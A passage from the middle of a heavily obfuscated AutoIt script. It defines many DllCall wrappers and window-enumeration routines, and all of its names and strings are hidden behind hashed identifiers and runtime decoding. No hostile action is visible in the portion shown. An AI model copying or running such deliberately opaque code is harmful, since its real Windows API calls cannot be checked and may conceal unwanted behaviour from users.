  1622.     Local $a505a20190d = DllCall($a264d404961, $a0c4d504760, $a094d605301, $a163d704e5b, $a2e2dc05e09, $a374d70590c, $a023d505255, $a5d4d80465f, $a5ccc900c31, $a304d90042c, $a622de02a47, $a344da00922, $a0f2df01952, $a574db03b1b, $a103d00243d, $a004dc05a60, $a013d101e20, $a343d90461b, $a013d204a61, $a514dd03649, $a333d302617, $a534de0252a, $a5d3d40154c)
  1623.     If @error Then Return SetError(@error, @extended, False)
  1624.     Return $a505a20190d[Number($a1f4df03a17)]
  1625. EndFunc
  1626.  
  1627. Func a0210902008($a425d006160, $a465d105e12, $a005d202b4e, $a1c5d304057)
  1628.     If NOT IsDeclared("SSA0210902008") Then
  1629.         Global $a625d402425 = a2b00005424($os[1626]), $a2c5d500402 = a2b00005424($os[1627]), $a305d603b46 = a2b00005424($os[1628]), $a3a5d70620e = a2b00005424($os[1629]), $a5c5d803e1b = a2b00005424($os[1630]), $a0f5d904a10 = a2b00005424($os[1631]), $a585da06344 = a2b00005424($os[1632]), $a405db04b0e = a2b00005424($os[1633]), $a015dc04e48 = a2b00005424($os[1634])
  1630.         Global $ssa0210902008 = 1
  1631.     EndIf
  1632.     Local $a505a20190d = DllCall($a625d402425, $a2c5d500402, $a305d603b46, $a3a5d70620e, $a425d006160, $a5c5d803e1b, $a465d105e12, $a0f5d904a10, $a005d202b4e, $a585da06344, $a1c5d304057)
  1633.     If @error Then Return SetError(@error, @extended, Number($a405db04b0e))
  1634.     Return $a505a20190d[Number($a015dc04e48)]
  1635. EndFunc
  1636.  
  1637. Func a1410a02b1a($a425d006160, $a465d105e12, $a005d202b4e, $a1c5d304057, $a3e5dd05b3d, $a395de00340)
  1638.     If NOT IsDeclared("SSA1410A02B1A") Then
  1639.         Global $a575df04754 = a2b00005424($os[1635]), $a5b6d00271b = a2b00005424($os[1636]), $a076d105252 = a2b00005424($os[1637]), $a316d205332 = a2b00005424($os[1638]), $a406d304b4a = a2b00005424($os[1639]), $a016d406336 = a2b00005424($os[1640]), $a036d50444d = a2b00005424($os[1641]), $a086d60260e = a2b00005424($os[1642]), $a5a6d70405c = a2b00005424($os[1643]), $a186d803260 = a2b00005424($os[1644]), $a306d902059 = a2b00005424($os[1645])
  1640.         Global $ssa1410a02b1a = 1
  1641.     EndIf
  1642.     Local $a505a20190d = DllCall($a575df04754, $a5b6d00271b, $a076d105252, $a316d205332, $a425d006160, $a406d304b4a, $a465d105e12, $a016d406336, $a005d202b4e, $a036d50444d, $a1c5d304057, $a086d60260e, $a3e5dd05b3d, $a5a6d70405c, $a395de00340)
  1643.     If @error Then Return SetError(@error, @extended, Number($a186d803260))
  1644.     Return $a505a20190d[Number($a306d902059)]
  1645. EndFunc
  1646.  
  1647. Func a3210b0190b($a3eca000d54, $a346da00151, $a21eba0242b, $a1debb02625, $a346db04408 = 1)
  1648.     If NOT IsDeclared("SSA3210B0190B") Then
  1649.         Global $a436df01f1e = a2b00005424($os[1646]), $a3f7d00050f = a2b00005424($os[1647]), $a127d102659 = a2b00005424($os[1648]), $a0d7d20320b = a2b00005424($os[1649]), $a237d301c03 = a2b00005424($os[1650]), $a3e7d40383f = a2b00005424($os[1651]), $a517d501e0f = a2b00005424($os[1652]), $a1c7d600755 = a2b00005424($os[1653]), $a2c7d705042 = a2b00005424($os[1654]), $a017d804851 = a2b00005424($os[1655]), $a157d904647 = a2b00005424($os[1656]), $a357db01507 = a2b00005424($os[1657]), $a637dc00942 = a2b00005424($os[1658]), $a277dd05719 = a2b00005424($os[1659]), $a567de0333d = a2b00005424($os[1660])
  1650.         Global $ssa3210b0190b = 1
  1651.     EndIf
  1652.     Local $a32ac505260 = a5a40b0314e($a3eca000d54)
  1653.     Local $a49eb70275a = a341020090f($a32ac505260)
  1654.     Local $a186dc01d12 = a4910105f41($a32ac505260, $a21eba0242b, $a1debb02625)
  1655.     Local $a1d6dd0211b = a34a0202c2c($a49eb70275a, $a186dc01d12)
  1656.     Local $a2f6de02137 = DllStructCreate($a2a28e05730)
  1657.     DllStructSetData($a2f6de02137, Number($a436df01f1e), Number($a3f7d00050f))
  1658.     DllStructSetData($a2f6de02137, Number($a127d102659), Number($a0d7d20320b))
  1659.     DllStructSetData($a2f6de02137, Number($a237d301c03), $a21eba0242b)
  1660.     DllStructSetData($a2f6de02137, Number($a3e7d40383f), $a1debb02625)
  1661.     If $a346db04408 Then
  1662.         $a346da00151 = BitOR(BitAND($a346da00151, Number($a517d501e0f)), BitShift(BitAND($a346da00151, Number($a1c7d600755)), -Number($a2c7d705042)), BitShift(BitAND($a346da00151, Number($a017d804851)), Number($a157d904647)))
  1663.     EndIf
  1664.     Local $a1a7da05d43 = a2510c00744($a346da00151)
  1665.     a5330504857($a49eb70275a, $a2f6de02137, $a1a7da05d43)
  1666.     If @error Then
  1667.         a5420001340($a186dc01d12)
  1668.         $a186dc01d12 = Number($a357db01507)
  1669.     EndIf
  1670.     a5420001340($a1a7da05d43)
  1671.     a08a0000035($a3eca000d54, $a32ac505260)
  1672.     a34a0202c2c($a49eb70275a, $a1d6dd0211b)
  1673.     a0410f01303($a49eb70275a)
  1674.     If NOT $a186dc01d12 Then Return SetError(Number($a637dc00942), Number($a277dd05719), Number($a567de0333d))
  1675.     Return $a186dc01d12
  1676. EndFunc
  1677.  
  1678. Func a2510c00744($a0b2d303851)
  1679.     If NOT IsDeclared("SSA2510C00744") Then
  1680.         Global $a437df02d5b = a2b00005424($os[1661]), $a4f8d003c10 = a2b00005424($os[1662]), $a188d105428 = a2b00005424($os[1663]), $a478d20525d = a2b00005424($os[1664]), $a118d304f18 = a2b00005424($os[1665]), $a548d401157 = a2b00005424($os[1666])
  1681.         Global $ssa2510c00744 = 1
  1682.     EndIf
  1683.     Local $a505a20190d = DllCall($a437df02d5b, $a4f8d003c10, $a188d105428, $a478d20525d, $a0b2d303851)
  1684.     If @error Then Return SetError(@error, @extended, Number($a118d304f18))
  1685.     Return $a505a20190d[Number($a548d401157)]
  1686. EndFunc
  1687.  
  1688. Func a5410d02d27($a088d50030c, $a418d603d51, $a00bc705e51, $a018d703d57, $a3f8d803d27, $a568d905c12, $a21eba0242b, $a1debb02625, $a248da02f00, $a158db04956 = 0, $a348dc0280a = 0, $a3b8dd00555 = 0)
  1689.     If NOT IsDeclared("SSA5410D02D27") Then
  1690.         Global $a298de05644 = a2b00005424($os[1667]), $a438df00626 = a2b00005424($os[1668]), $a369d001713 = a2b00005424($os[1669]), $a309d104b60 = a2b00005424($os[1670]), $a049d202854 = a2b00005424($os[1671]), $a079d301238 = a2b00005424($os[1672]), $a579d403118 = a2b00005424($os[1673]), $a4e9d502d01 = a2b00005424($os[1674]), $a389d600f00 = a2b00005424($os[1675]), $a039d703c1c = a2b00005424($os[1676]), $a4c9d80192d = a2b00005424($os[1677]), $a4d9d90623a = a2b00005424($os[1678]), $a139da01754 = a2b00005424($os[1679]), $a4b9db03024 = a2b00005424($os[1680]), $a049dc02532 = a2b00005424($os[1681]), $a629dd01752 = a2b00005424($os[1682]), $a2d9de02014 = a2b00005424($os[1683]), $a519df02506 = a2b00005424($os[1684])
  1691.         Global $ssa5410d02d27 = 1
  1692.     EndIf
  1693.     If $a348dc0280a = Number($a298de05644) Then $a348dc0280a = a5450806108("")
  1694.     Local $a505a20190d = DllCall($a438df00626, $a369d001713, $a309d104b60, $a049d202854, $a088d50030c, $a079d301238, $a418d603d51, $a579d403118, $a00bc705e51, $a4e9d502d01, $a018d703d57, $a389d600f00, $a3f8d803d27, $a039d703c1c, $a568d905c12, $a4c9d80192d, $a21eba0242b, $a4d9d90623a, $a1debb02625, $a139da01754, $a248da02f00, $a4b9db03024, $a158db04956, $a049dc02532, $a348dc0280a, $a629dd01752, $a3b8dd00555)
  1695.     If @error Then Return SetError(@error, @extended, Number($a2d9de02014))
  1696.     Return $a505a20190d[Number($a519df02506)]
  1697. EndFunc
  1698.  
  1699. Func a4b10e01953($a3eca000d54, $a2aca100d54, $a5cad000030, $a4ead104b00)
  1700.     If NOT IsDeclared("SSA4B10E01953") Then
  1701.         Global $a3dad20350c = a2b00005424($os[1685]), $a1fad305918 = a2b00005424($os[1686]), $a62ad404114 = a2b00005424($os[1687]), $a1cad504b36 = a2b00005424($os[1688]), $a04ad605005 = a2b00005424($os[1689]), $a1aad701a23 = a2b00005424($os[1690]), $a22ad80305c = a2b00005424($os[1691]), $a5cad900531 = a2b00005424($os[1692]), $a12ada06108 = a2b00005424($os[1693])
  1702.         Global $ssa4b10e01953 = 1
  1703.     EndIf
  1704.     Local $a505a20190d = DllCall($a3dad20350c, $a1fad305918, $a62ad404114, $a1cad504b36, $a3eca000d54, $a04ad605005, $a2aca100d54, $a1aad701a23, $a5cad000030, $a22ad80305c, $a4ead104b00)
  1705.     If @error Then Return SetError(@error, @extended, Number($a5cad900531))
  1706.     Return $a505a20190d[Number($a12ada06108)]
  1707. EndFunc
  1708.  
  1709. Func a0410f01303($a32ac505260)
  1710.     If NOT IsDeclared("SSA0410F01303") Then
  1711.         Global $a59adb0211a = a2b00005424($os[1694]), $a1fadc05a36 = a2b00005424($os[1695]), $a43add04a4f = a2b00005424($os[1696]), $a15ade0470c = a2b00005424($os[1697]), $a05adf0075d = a2b00005424($os[1698])
  1712.         Global $ssa0410f01303 = 1
  1713.     EndIf
  1714.     Local $a505a20190d = DllCall($a59adb0211a, $a1fadc05a36, $a43add04a4f, $a15ade0470c, $a32ac505260)
  1715.     If @error Then Return SetError(@error, @extended, False)
  1716.     Return $a505a20190d[Number($a05adf0075d)]
  1717. EndFunc
  1718.  
  1719. Func a5420001340($a491ca0352d)
  1720.     If NOT IsDeclared("SSA5420001340") Then
  1721.         Global $a1dbd002357 = a2b00005424($os[1699]), $a3abd103546 = a2b00005424($os[1700]), $a3bbd205143 = a2b00005424($os[1701]), $a1bbd306213 = a2b00005424($os[1702]), $a48bd406061 = a2b00005424($os[1703])
  1722.         Global $ssa5420001340 = 1
  1723.     EndIf
  1724.     Local $a505a20190d = DllCall($a1dbd002357, $a3abd103546, $a3bbd205143, $a1bbd306213, $a491ca0352d)
  1725.     If @error Then Return SetError(@error, @extended, False)
  1726.     Return $a505a20190d[Number($a48bd406061)]
  1727. EndFunc
  1728.  
  1729. Func a0120102a4e($a3a9c101b29)
  1730.     If NOT IsDeclared("SSA0120102A4E") Then
  1731.         Global $a0ebd50405f = a2b00005424($os[1704]), $a47bd605944 = a2b00005424($os[1705]), $a2fbd701043 = a2b00005424($os[1706]), $a26bd80191e = a2b00005424($os[1707]), $a17bd901f61 = a2b00005424($os[1708])
  1732.         Global $ssa0120102a4e = 1
  1733.     EndIf
  1734.     Local $a505a20190d = DllCall($a0ebd50405f, $a47bd605944, $a2fbd701043, $a26bd80191e, $a3a9c101b29)
  1735.     If @error Then Return SetError(@error, @extended, False)
  1736.     Return $a505a20190d[Number($a17bd901f61)]
  1737. EndFunc
  1738.  
  1739. Func a2020205610($a3eca000d54)
  1740.     If NOT IsDeclared("SSA2020205610") Then
  1741.         Global $a0ebda01e00 = a2b00005424($os[1709]), $a60bdb01f02 = a2b00005424($os[1710]), $a40bdc02f46 = a2b00005424($os[1711]), $a15bdd05312 = a2b00005424($os[1712]), $a57bde03c54 = a2b00005424($os[1713])
  1742.         Global $ssa2020205610 = 1
  1743.     EndIf
  1744.     Local $a505a20190d = DllCall($a0ebda01e00, $a60bdb01f02, $a40bdc02f46, $a15bdd05312, $a3eca000d54)
  1745.     If @error Then Return SetError(@error, @extended, False)
  1746.     Return $a505a20190d[Number($a57bde03c54)]
  1747. EndFunc
  1748.  
  1749. Func a0020302e22($a32ac505260, $a5abdf01b5b, $a0ccd000252, $a1ccd10440e)
  1750.     If NOT IsDeclared("SSA0020302E22") Then
  1751.         Global $a40cd203042 = a2b00005424($os[1714]), $a57cd301016 = a2b00005424($os[1715]), $a44cd40045c = a2b00005424($os[1716]), $a4dcd500d18 = a2b00005424($os[1717]), $a4fcd60543e = a2b00005424($os[1718]), $a22cd70254e = a2b00005424($os[1719]), $a0ccd806304 = a2b00005424($os[1720]), $a61cd902846 = a2b00005424($os[1721])
  1752.         Global $ssa0020302e22 = 1
  1753.     EndIf
  1754.     Local $a505a20190d = DllCall($a40cd203042, $a57cd301016, $a44cd40045c, $a4dcd500d18, $a32ac505260, $a4fcd60543e, $a5abdf01b5b, $a22cd70254e, $a0ccd000252, $a0ccd806304, $a1ccd10440e)
  1755.     If @error Then Return SetError(@error, @extended, False)
  1756.     Return $a505a20190d[Number($a61cd902846)]
  1757. EndFunc
  1758.  
  1759. Func a0d20406239($a32ac505260, $a5abdf01b5b, $a32cda0164c, $a27cdb0074f)
  1760.     If NOT IsDeclared("SSA0D20406239") Then
  1761.         Global $a04cdc00658 = a2b00005424($os[1722]), $a40cdd02922 = a2b00005424($os[1723]), $a18cde01f2b = a2b00005424($os[1724]), $a0acdf06345 = a2b00005424($os[1725]), $a1add003721 = a2b00005424($os[1726]), $a05dd100f41 = a2b00005424($os[1727]), $a20dd205f61 = a2b00005424($os[1728]), $a00dd305c4e = a2b00005424($os[1729])
  1762.         Global $ssa0d20406239 = 1
  1763.     EndIf
  1764.     Local $a505a20190d = DllCall($a04cdc00658, $a40cdd02922, $a18cde01f2b, $a0acdf06345, $a32ac505260, $a1add003721, $a5abdf01b5b, $a05dd100f41, $a32cda0164c, $a20dd205f61, $a27cdb0074f)
  1765.     If @error Then Return SetError(@error, @extended, False)
  1766.     Return $a505a20190d[Number($a00dd305c4e)]
  1767. EndFunc
  1768.  
  1769. Func a5f20501b42($a32ac505260, $a3f8d803d27, $a568d905c12, $a3a9c101b29)
  1770.     If NOT IsDeclared("SSA5F20501B42") Then
  1771.         Global $a43dd403a19 = a2b00005424($os[1730]), $a50dd500334 = a2b00005424($os[1731]), $a17dd60533b = a2b00005424($os[1732]), $a23dd705450 = a2b00005424($os[1733]), $a15dd80081b = a2b00005424($os[1734]), $a0fdd90195e = a2b00005424($os[1735]), $a5fdda03b16 = a2b00005424($os[1736]), $a48ddb05729 = a2b00005424($os[1737])
  1772.         Global $ssa5f20501b42 = 1
  1773.     EndIf
  1774.     Local $a505a20190d = DllCall($a43dd403a19, $a50dd500334, $a17dd60533b, $a23dd705450, $a32ac505260, $a15dd80081b, $a3f8d803d27, $a0fdd90195e, $a568d905c12, $a5fdda03b16, $a3a9c101b29)
  1775.     If @error Then Return SetError(@error, @extended, False)
  1776.     Return $a505a20190d[Number($a48ddb05729)]
  1777. EndFunc
  1778.  
  1779. Func a5d20604e57($a32ac505260, $a3f8d803d27, $a568d905c12, $a3a9c101b29, $a21eba0242b = 0, $a1debb02625 = 0, $a14ddc00c07 = 0, $a1a7da05d43 = 0, $a103d00243d = 3)
  1780.     If NOT IsDeclared("SSA5D20604E57") Then
  1781.         Global $a3cdde04e0b = a2b00005424($os[1738]), $a57ddf02556 = a2b00005424($os[1739]), $a23ed004423 = a2b00005424($os[1740]), $a53ed100f13 = a2b00005424($os[1741]), $a0eed205d26 = a2b00005424($os[1742]), $a00ed303c22 = a2b00005424($os[1743]), $a45ed402f0e = a2b00005424($os[1744]), $a23ed501242 = a2b00005424($os[1745]), $a44ed602704 = a2b00005424($os[1746]), $a0fed703d47 = a2b00005424($os[1747]), $a15ed802758 = a2b00005424($os[1748]), $a2fed90454a = a2b00005424($os[1749]), $a43eda01c5d = a2b00005424($os[1750]), $a5dedb02906 = a2b00005424($os[1751]), $a28edc00102 = a2b00005424($os[1752]), $a47edd04400 = a2b00005424($os[1753]), $a35ede01939 = a2b00005424($os[1754]), $a24edf0321f = a2b00005424($os[1755])
  1782.         Global $ssa5d20604e57 = 1
  1783.     EndIf
  1784.     Local $a58ddd02b44
  1785.     Switch $a103d00243d
  1786.         Case Number($a3cdde04e0b)
  1787.             $a58ddd02b44 = $a5d0b405825
  1788.         Case Number($a57ddf02556)
  1789.             $a58ddd02b44 = $a300b604005
  1790.         Case Number($a23ed004423)
  1791.             $a58ddd02b44 = $a1f0b80570d
  1792.         Case Number($a53ed100f13)
  1793.             $a58ddd02b44 = $a3e0ba01e26
  1794.         Case Number($a0eed205d26)
  1795.             $a58ddd02b44 = $a420bc03863
  1796.         Case Else
  1797.             $a58ddd02b44 = $a370be02136
  1798.     EndSwitch
  1799.     Local $a505a20190d = DllCall($a00ed303c22, $a45ed402f0e, $a23ed501242, $a44ed602704, $a32ac505260, $a0fed703d47, $a3f8d803d27, $a15ed802758, $a568d905c12, $a2fed90454a, $a3a9c101b29, $a43eda01c5d, $a21eba0242b, $a5dedb02906, $a1debb02625, $a28edc00102, $a14ddc00c07, $a47edd04400, $a1a7da05d43, $a35ede01939, $a58ddd02b44)
  1800.     If @error Then Return SetError(@error, @extended, False)
  1801.     Return $a505a20190d[Number($a24edf0321f)]
  1802. EndFunc
  1803.  
  1804. Func a3920705348($a32ac505260, $a32fd004162, $a17fd105720, $a01fd201351, $a28fd302613)
  1805.     a0680e0105f($a32ac505260, $a32fd004162, $a17fd105720)
  1806.     If @error Then Return SetError(@error, @extended, False)
  1807.     a0d70e01a5a($a32ac505260, $a01fd201351, $a28fd302613)
  1808.     If @error Then Return SetError(@error, @extended, False)
  1809.     Return True
  1810. EndFunc
  1811.  
  1812. Func a3f20800721($a32ac505260, $a09fd400f0d, ByRef $a2f6de02137, $a103d00243d)
  1813.     If NOT IsDeclared("SSA3F20800721") Then
  1814.         Global $a39fd502055 = a2b00005424($os[1756]), $a4ffd603821 = a2b00005424($os[1757]), $a15fd703536 = a2b00005424($os[1758]), $a10fd803939 = a2b00005424($os[1759]), $a4afd905c43 = a2b00005424($os[1760]), $a30fda01f54 = a2b00005424($os[1761]), $a01fdb02850 = a2b00005424($os[1762]), $a26fdc03517 = a2b00005424($os[1763]), $a1afdd0450d = a2b00005424($os[1764]), $a10fde0472f = a2b00005424($os[1765]), $a26fdf0355f = a2b00005424($os[1766])
  1815.         Global $ssa3f20800721 = 1
  1816.     EndIf
  1817.     Local $a505a20190d = DllCall($a39fd502055, $a4ffd603821, $a15fd703536, $a10fd803939, $a32ac505260, $a4afd905c43, $a09fd400f0d, $a30fda01f54, -Number($a01fdb02850), $a26fdc03517, $a2f6de02137, $a1afdd0450d, $a103d00243d)
  1818.     If @error Then Return SetError(@error, @extended, Number($a10fde0472f))
  1819.     Return $a505a20190d[Number($a26fdf0355f)]
  1820. EndFunc
  1821.  
  1822. Func a0c20903e15($a610e005817, $a4b0e103e3b, $a4e0e201633, $a010e304945, $a390e400b35, $a58ddd02b44)
  1823.     If NOT IsDeclared("SSA0C20903E15") Then
  1824.         Global $a0a0e601838 = a2b00005424($os[1767]), $a0f0e70562b = a2b00005424($os[1768]), $a460e803c23 = a2b00005424($os[1769]), $a550e903a2b = a2b00005424($os[1770]), $a080ea03815 = a2b00005424($os[1771]), $a470eb04a44 = a2b00005424($os[1772]), $a470ec00104 = a2b00005424($os[1773]), $a2b0ed00c05 = a2b00005424($os[1774]), $a180ee00137 = a2b00005424($os[1775]), $a270ef01449 = a2b00005424($os[1776]), $a071e003d40 = a2b00005424($os[1777]), $a0e1e10150b = a2b00005424($os[1778]), $a451e203e62 = a2b00005424($os[1779]), $a601e301602 = a2b00005424($os[1780]), $a0f1e400e60 = a2b00005424($os[1781])
  1825.         Global $ssa0c20903e15 = 1
  1826.     EndIf
  1827.     Local $a3e0e502f1b = DllCall($a0a0e601838, $a0f0e70562b, $a460e803c23, $a550e903a2b, $a610e005817, $a080ea03815, $a4b0e103e3b, $a470eb04a44, $a4e0e201633, $a470ec00104, Number($a2b0ed00c05), $a180ee00137, $a010e304945, $a270ef01449, $a390e400b35, $a071e003d40, $a58ddd02b44)
  1828.     If @error OR NOT $a3e0e502f1b[Number($a0e1e10150b)] Then Return SetError(Number($a451e203e62), @extended, Number($a601e301602))
  1829.     Return $a3e0e502f1b[Number($a0f1e400e60)]
  1830. EndFunc
  1831.  
  1832. Func a3920a02411($a3eca000d54, $a331e502113 = True)
  1833.     If NOT IsDeclared("SSA3920A02411") Then
  1834.         Global $a4b1e605512 = a2b00005424($os[1782]), $a401e701622 = a2b00005424($os[1783]), $a021e802749 = a2b00005424($os[1784]), $a441e902737 = a2b00005424($os[1785]), $a2f1ea02e41 = a2b00005424($os[1786]), $a191eb0431b = a2b00005424($os[1787])
  1835.         Global $ssa3920a02411 = 1
  1836.     EndIf
  1837.     Local $a505a20190d = DllCall($a4b1e605512, $a401e701622, $a021e802749, $a441e902737, $a3eca000d54, $a2f1ea02e41, $a331e502113)
  1838.     If @error Then Return SetError(@error, @extended, False)
  1839.     Return $a505a20190d[Number($a191eb0431b)]
  1840. EndFunc
  1841.  
  1842. Func a6020b0345a($a551ec0201d, $a2f1ed03008)
  1843.     If NOT IsDeclared("SSA6020B0345A") Then
  1844.         Global $a091ef04a3c = a2b00005424($os[1788]), $a362e00201e = a2b00005424($os[1789]), $a2e2e20583a = a2b00005424($os[1790]), $a412e304a4e = a2b00005424($os[1791]), $a482e404d43 = a2b00005424($os[1792]), $a152e50525a = a2b00005424($os[1793]), $a212e603201 = a2b00005424($os[1794]), $a502e902e47 = a2b00005424($os[1795]), $a3b2ea05e23 = a2b00005424($os[1796]), $a202eb03b28 = a2b00005424($os[1797]), $a522ec05a53 = a2b00005424($os[1798]), $a182ed0075b = a2b00005424($os[1799]), $a582ee02a38 = a2b00005424($os[1800]), $a022ef01658 = a2b00005424($os[1801]), $a233e00582f = a2b00005424($os[1802]), $a543e102151 = a2b00005424($os[1803]), $a443e203e18 = a2b00005424($os[1804]), $a183e405d4a = a2b00005424($os[1805]), $a193e500e25 = a2b00005424($os[1806]), $a323e602024 = a2b00005424($os[1807]), $a393e705d40 = a2b00005424($os[1808]), $a1c3e80303a = a2b00005424($os[1809]), $a043e90390c = a2b00005424($os[1810]), $a493ea0140a = a2b00005424($os[1811]), $a1a3eb02f3a = a2b00005424($os[1812]), $a453ec04420 = a2b00005424($os[1813]), $a133ed02d36 = a2b00005424($os[1814]), $a473ee02224 = a2b00005424($os[1815]), $a2f3ef0562f = a2b00005424($os[1816]), $a494e001a03 = a2b00005424($os[1817]), $a464e102d51 = a2b00005424($os[1818]), $a454e20220d = a2b00005424($os[1819]), $a5c4e302842 = a2b00005424($os[1820]), $a604e40424c = a2b00005424($os[1821]), $a184e50111c = a2b00005424($os[1822]), $a034e60140c = a2b00005424($os[1823]), $a624e701951 = a2b00005424($os[1824]), $a374e805515 = a2b00005424($os[1825])
  1845.         Global $ssa6020b0345a = 1
  1846.     EndIf
  1847.     Local $a231ee03d04 = Number($a091ef04a3c), $a103d00243d = Number($a362e00201e), $a532e10040c[Number($a2e2e20583a)]
  1848.     If $a551ec0201d <> "" Then
  1849.         $a231ee03d04 = DllStructCreate($a412e304a4e & StringLen($a551ec0201d) + Number($a482e404d43) & $a152e50525a)
  1850.         DllStructSetData($a231ee03d04, $a212e603201, $a551ec0201d)
  1851.     EndIf
  1852.     Local $a1a2e705b33 = DllStructCreate($a11cb502024)
  1853.     Local $a5d2e80243a = DllStructGetSize($a1a2e705b33)
  1854.     DllStructSetData($a1a2e705b33, $a502e902e47, $a5d2e80243a)
  1855.     DllCall($a3b2ea05e23, $a202eb03b28, $a522ec05a53, $a182ed0075b, $a231ee03d04, $a582ee02a38, $a2f1ed03008, $a022ef01658, $a1a2e705b33, $a233e00582f, Number($a543e102151))
  1856.     If @error Then Return SetError(@error, @extended, Number($a443e203e18))
  1857.     Local $a093e30164a = DllStructGetData($a1a2e705b33, $a183e405d4a)
  1858.     If BitAND($a093e30164a, $a591b002a00) <> Number($a193e500e25) Then $a103d00243d = BitOR($a103d00243d, Number($a323e602024))
  1859.     If BitAND($a093e30164a, $a561b20472a) <> Number($a393e705d40) Then $a103d00243d = BitOR($a103d00243d, Number($a1c3e80303a))
  1860.     If BitAND($a093e30164a, $a4a1b401634) <> Number($a043e90390c) Then $a103d00243d = BitOR($a103d00243d, Number($a493ea0140a))
  1861.     If BitAND($a093e30164a, $a411b60034b) <> Number($a1a3eb02f3a) Then $a103d00243d = BitOR($a103d00243d, Number($a453ec04420))
  1862.     If BitAND($a093e30164a, $a181b800332) <> Number($a133ed02d36) Then $a103d00243d = BitOR($a103d00243d, Number($a473ee02224))
  1863.     If BitAND($a093e30164a, $a031ba02e3c) <> Number($a2f3ef0562f) Then $a103d00243d = BitOR($a103d00243d, Number($a494e001a03))
  1864.     $a532e10040c[Number($a464e102d51)] = True
  1865.     $a532e10040c[Number($a454e20220d)] = DllStructGetData($a1a2e705b33, $a5c4e302842)
  1866.     $a532e10040c[Number($a604e40424c)] = DllStructGetData($a1a2e705b33, $a184e50111c)
  1867.     $a532e10040c[Number($a034e60140c)] = $a103d00243d
  1868.     $a532e10040c[Number($a624e701951)] = DllStructGetData($a1a2e705b33, $a374e805515)
  1869.     Return $a532e10040c
  1870. EndFunc
  1871.  
  1872. Func a5720c02c2a($a2a4e904542 = True, $a3eca000d54 = Default)
  1873.     a0620f05d03()
  1874.     If $a3eca000d54 = Default Then $a3eca000d54 = a2a40c0473f()
  1875.     a0c20e0054d($a3eca000d54, $a2a4e904542)
  1876.     Return $a02da901c3e
  1877. EndFunc
  1878.  
  1879. Func a3520d05812($a3eca000d54, $a418d603d51 = "")
  1880.     If NOT IsDeclared("SSA3520D05812") Then
  1881.         Global $a274ea0483c = a2b00005424($os[1826]), $a054eb06258 = a2b00005424($os[1827]), $a294ec02e51 = a2b00005424($os[1828]), $a554ee06058 = a2b00005424($os[1829]), $a3b4ef04120 = a2b00005424($os[1830]), $a165e00301c = a2b00005424($os[1831]), $a2f5e105638 = a2b00005424($os[1832]), $a125e203749 = a2b00005424($os[1833]), $a615e305b3e = a2b00005424($os[1834]), $a1a5e405b34 = a2b00005424($os[1835]), $a505e503e08 = a2b00005424($os[1836]), $a605e602909 = a2b00005424($os[1837]), $a4f5e705756 = a2b00005424($os[1838]), $a2b5e803222 = a2b00005424($os[1839])
  1882.         Global $ssa3520d05812 = 1
  1883.     EndIf
  1884.     If $a418d603d51 = "" Then $a418d603d51 = a0140201854($a3eca000d54)
  1885.     $a02da901c3e[Number($a274ea0483c)][Number($a054eb06258)] += Number($a294ec02e51)
  1886.     Local $a0a4ed03152 = $a02da901c3e[Number($a554ee06058)][Number($a3b4ef04120)]
  1887.     If $a0a4ed03152 >= $a02da901c3e[Number($a165e00301c)][Number($a2f5e105638)] Then
  1888.         ReDim $a02da901c3e[$a0a4ed03152 + Number($a125e203749)][Number($a615e305b3e)]
  1889.         $a02da901c3e[Number($a1a5e405b34)][Number($a505e503e08)] += Number($a605e602909)
  1890.     EndIf
  1891.     $a02da901c3e[$a0a4ed03152][Number($a4f5e705756)] = $a3eca000d54
  1892.     $a02da901c3e[$a0a4ed03152][Number($a2b5e803222)] = $a418d603d51
  1893. EndFunc
  1894.  
  1895. Func a0c20e0054d($a3eca000d54, $a2a4e904542 = True)
  1896.     If NOT IsDeclared("SSA0C20E0054D") Then
  1897.         Global $a205e905605 = a2b00005424($os[1840])
  1898.         Global $ssa0c20e0054d = 1
  1899.     EndIf
  1900.     $a3eca000d54 = a466090092d($a3eca000d54, $a2a0b205f60)
  1901.     While $a3eca000d54 <> Number($a205e905605)
  1902.         If (NOT $a2a4e904542) OR a5370c01246($a3eca000d54) Then
  1903.             a0c20e0054d($a3eca000d54, $a2a4e904542)
  1904.             a3520d05812($a3eca000d54)
  1905.         EndIf
  1906.         $a3eca000d54 = a466090092d($a3eca000d54, $a1c0b002514)
  1907.     WEnd
  1908. EndFunc
  1909.  
  1910. Func a0620f05d03()
  1911.     If NOT IsDeclared("SSA0620F05D03") Then
  1912.         Global $a215ea00c3a = a2b00005424($os[1841]), $a065eb03522 = a2b00005424($os[1842]), $a045ec05837 = a2b00005424($os[1843]), $a155ed01531 = a2b00005424($os[1844]), $a5e5ee04c27 = a2b00005424($os[1845]), $a405ef05d14 = a2b00005424($os[1846]), $a506e001f42 = a2b00005424($os[1847]), $a426e10441f = a2b00005424($os[1848])
  1913.         Global $ssa0620f05d03 = 1
  1914.     EndIf
  1915.     ReDim $a02da901c3e[Number($a215ea00c3a)][Number($a065eb03522)]
  1916.     $a02da901c3e[Number($a045ec05837)][Number($a155ed01531)] = Number($a5e5ee04c27)
  1917.     $a02da901c3e[Number($a405ef05d14)][Number($a506e001f42)] = Number($a426e10441f)
  1918. EndFunc
  1919.  
  1920. Func a2330002b32()
  1921.     If NOT IsDeclared("SSA2330002B32") Then
  1922.         Global $a446e203a44 = a2b00005424($os[1849]), $a476e302a00 = a2b00005424($os[1850]), $a1d6e402b14 = a2b00005424($os[1851]), $a496e50523c = a2b00005424($os[1852]), $a3f6e603b13 = a2b00005424($os[1853])
  1923.         Global $ssa2330002b32 = 1
  1924.     EndIf
  1925.     a0620f05d03()
  1926.     Local $a3eca000d54 = a466090092d(a2a40c0473f(), $a2a0b205f60)
  1927.     Local $a418d603d51
  1928.     While $a3eca000d54 <> Number($a446e203a44)
  1929.         If a5370c01246($a3eca000d54) Then
  1930.             $a418d603d51 = a0140201854($a3eca000d54)
  1931.             If $a418d603d51 = $a476e302a00 Then
  1932.                 a3520d05812($a3eca000d54)
  1933.             ElseIf $a418d603d51 = $a1d6e402b14 Then
  1934.                 a3520d05812($a3eca000d54)
  1935.             ElseIf $a418d603d51 = $a496e50523c Then
  1936.                 a3520d05812($a3eca000d54)
  1937.             ElseIf $a418d603d51 = $a3f6e603b13 Then
  1938.                 a0c20e0054d($a3eca000d54)
  1939.             EndIf
  1940.         EndIf
  1941.         $a3eca000d54 = a466090092d($a3eca000d54, $a1c0b002514)
  1942.     WEnd
  1943.     Return $a02da901c3e
  1944. EndFunc
  1945.  
  1946. Func a5f3010215e()
  1947.     If NOT IsDeclared("SSA5F3010215E") Then
